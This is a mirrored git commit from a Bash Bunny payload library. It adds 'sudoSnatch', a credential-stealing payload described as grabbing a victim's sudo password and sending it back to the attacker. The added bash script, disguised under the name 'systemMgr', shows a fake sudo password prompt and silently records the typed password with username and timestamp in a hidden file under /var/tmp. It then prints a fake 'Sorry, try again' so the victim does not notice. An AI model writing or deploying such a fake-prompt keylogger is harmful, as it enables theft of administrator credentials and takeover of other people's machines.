mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
uploaded sudoSnatch (#507)
* uploaded sudoSnatch sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. * changing payload category * uploaded sudoSnatch
This commit is contained in:
5
payloads/library/credentials/sudoSnatch/systemMgr
Normal file
5
payloads/library/credentials/sudoSnatch/systemMgr
Normal file
@@ -0,0 +1,5 @@
|
||||
#!/bin/bash
|
||||
echo -n "[sudo] password for $(whoami):"
|
||||
IFS="" read -s pass
|
||||
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
|
||||
echo -e "\nSorry, try again."
|
||||
Reference in New Issue
Block a user